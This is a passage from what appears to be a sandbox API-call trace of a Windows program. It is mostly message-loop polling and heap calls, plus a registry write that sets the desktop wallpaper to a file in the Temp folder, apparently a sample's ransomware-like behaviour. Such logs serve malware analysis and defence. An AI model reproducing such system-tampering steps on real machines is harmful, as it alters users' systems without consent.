(dwMilliseconds=0xa) [0274.293] timeGetTime () returned 0x1184c1b [0274.293] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0274.293] Sleep (dwMilliseconds=0xa) [0274.309] timeGetTime () returned 0x1184c2a [0274.309] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0274.309] Sleep (dwMilliseconds=0xa) [0274.325] timeGetTime () returned 0x1184c3b [0274.325] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0274.326] Sleep (dwMilliseconds=0xa) [0274.347] timeGetTime () returned 0x1184c50 [0274.347] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0274.347] Sleep (dwMilliseconds=0xa) [0274.364] timeGetTime () returned 0x1184c60 [0274.364] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0274.364] Sleep (dwMilliseconds=0xa) [0274.465] timeGetTime () returned 0x1184cc6 [0274.465] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0274.465] Sleep (dwMilliseconds=0xa) [0274.479] timeGetTime () returned 0x1184cd4 [0274.479] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0274.479] Sleep (dwMilliseconds=0xa) [0274.509] timeGetTime () returned 0x1184cf1 [0274.509] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0274.509] Sleep (dwMilliseconds=0xa) [0274.553] timeGetTime () returned 0x1184d1d [0274.553] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0274.553] TranslateMessage (lpMsg=0x8cf798) returned 0 [0274.553] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0274.553] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0274.553] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0274.553] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0274.553] Sleep (dwMilliseconds=0xa) [0274.570] timeGetTime () returned 0x1184d2f [0274.570] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0274.570] Sleep (dwMilliseconds=0xa) [0274.585] timeGetTime () returned 0x1184d3f [0274.585] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0274.585] Sleep (dwMilliseconds=0xa) [0274.620] timeGetTime () returned 0x1184d62 [0274.620] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0274.620] Sleep (dwMilliseconds=0xa) [0274.664] timeGetTime () returned 0x1184d8c [0274.664] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0274.664] Sleep (dwMilliseconds=0xa) [0274.699] timeGetTime () returned 0x1184daf [0274.699] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0274.699] Sleep (dwMilliseconds=0xa) [0274.735] timeGetTime () returned 0x1184dd3 [0274.735] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0274.735] Sleep (dwMilliseconds=0xa) [0274.770] timeGetTime () returned 0x1184df7 [0274.770] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0274.770] Sleep (dwMilliseconds=0xa) [0274.804] timeGetTime () returned 0x1184e1a [0274.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0274.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0274.805] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0274.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0274.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0274.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0274.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0274.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0274.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0274.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0274.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0274.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0274.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0274.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0274.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0274.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0274.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0274.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0274.806] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf560 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0274.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0274.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0274.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0274.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0274.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0274.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0274.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0274.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0274.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0274.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0274.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0274.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0274.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0274.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0274.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0274.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0274.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0274.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0274.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0274.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0274.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0274.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0274.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0274.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0274.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0274.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0274.807] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0274.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0274.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0274.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0274.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0274.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0274.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0274.807] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x2d0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0274.808] RegSetValueExW (in: hKey=0x2d0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0274.808] RegCloseKey (hKey=0x2d0) returned 0x0 [0274.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0274.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0274.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0274.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0274.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0274.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0274.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0274.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0274.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0274.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0274.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0274.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0274.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0274.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0274.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0274.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0274.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0274.842] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0274.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0274.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0274.843] CharUpperBuffW (in: lpsz="_WINAPI_SYSTEMPARAMETERSINFO", cchLength=0x1c | out: lpsz="_WINAPI_SYSTEMPARAMETERSINFO") returned 0x1c [0274.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0274.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0274.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0274.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0274.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0274.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0274.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0274.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0274.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b88 [0274.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0274.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0274.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0274.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a90 [0274.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0274.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0274.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0274.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0274.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0274.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0274.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0274.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0274.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0274.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a30 [0274.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a18 [0274.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0274.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0274.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0274.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0274.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0274.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0274.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0274.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0274.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0274.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0274.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b50 [0274.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51aa8 [0274.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0274.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0274.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0274.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0274.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0274.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0274.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0274.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0274.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0274.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0274.844] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0274.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0274.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0274.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0274.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0274.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0274.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0274.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0274.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0274.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0274.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0274.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0274.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0274.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0274.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0274.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0274.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0274.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0274.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0274.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0274.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0274.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0274.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0274.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0274.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0274.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0274.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0274.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0274.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0274.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0274.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0274.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0274.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0274.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0274.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0274.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0274.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0274.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0274.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0274.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0274.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0274.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0274.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0274.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0274.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0274.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0274.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0274.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0274.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0274.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0274.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0274.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0274.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0274.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0274.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0274.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0274.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0274.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0274.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0274.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0274.847] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0274.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0274.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0274.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0274.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0274.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0274.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0274.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0274.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0274.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0274.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0274.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0274.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0274.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0274.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0274.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0274.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0274.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0274.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0274.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0274.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0274.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0274.848] 